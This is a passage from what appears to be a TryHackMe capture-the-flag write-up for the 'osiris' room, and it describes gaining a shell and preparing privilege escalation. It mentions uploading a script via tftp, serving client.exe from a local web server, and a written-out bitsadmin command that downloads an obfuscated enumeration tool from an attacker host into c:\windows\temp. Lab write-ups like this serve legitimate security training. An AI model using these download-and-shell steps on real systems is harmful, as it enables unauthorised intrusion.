ChrisPritchard/ctf-writeups/tryhackme-rooms/osiris-wip.md

 I put the above in a file named `script`, then connected over tftp and ran `put script` to put it in place.
 For this to work, a local webserver on port 1234 allows client.exe to be downloaded, and I got a shell connection in seconds.

 On the machine as `alcrez` the first flag is in their desktop folder.
+Downloading further files (e.g. obfuscated winpeas or other exploit tools) can be done with `bitsadmin.exe /transfer /Download /priority Foreground http://10.10.80.36:1234/w.exe c:\windows\temp\w.exe`, or using tftp if that floats your boat.

 To privesc to system, a few things can be picked up from local enumeration: